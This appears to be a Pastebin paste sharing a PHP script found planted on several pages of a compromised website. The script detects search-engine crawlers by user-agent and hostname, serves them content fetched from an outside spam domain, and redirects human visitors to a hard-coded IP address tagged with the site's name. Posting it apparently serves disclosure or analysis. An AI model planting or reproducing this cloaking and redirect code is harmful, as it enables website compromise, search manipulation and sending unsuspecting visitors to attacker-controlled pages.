Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Site compromised with several pages with similar content as below
- #index.php
- <?php $user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
- '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
- '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
- '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
- '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i',
- '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
- '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
- '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
- '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
- '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
- '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
- '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
- '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
- '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
- '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
- '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
- '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
- '#charlotte#i', '#ngb#i', '#BingBot#i' ) ;
- if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){
- $isbot = 1;
- }
- if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
- {
- $isbot = 1;
- }
- if ($isbot)
- {
- $url = "http://20150109c.fefnjefb.in/uqmwsfsobtvtcxnvmudcsaoe";
- $options = array(
- 'http'=>array(
- 'method'=>"GET",
- 'header'=>"Accept-language: en\r\n" .
- "Cookie: foo=bar\r\n" . // check function.stream-context-create on php.net
- "User-Agent: ".$_SERVER['HTTP_USER_AGENT']."\r\n" // i.e. An iPad
- )
- );
- $context = stream_context_create($options);
- $html = file_get_contents($url, false, $context);
- echo $html;
- }
- if(!@$isbot)
- {
- //
- $s = dirname($_SERVER['PHP_SELF']);
- if ($s == '\\' | $s == '/') {$s = ('');}
- $s = $_SERVER['SERVER_NAME'] . $s;
- header("Location: http://173.236.65.24/input/?mark=20150109-$s");
- //header("Location: http://20150109c.fefnjefb.in/uqmwsfsobtvtcxnvmudcsaoe");
- exit;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement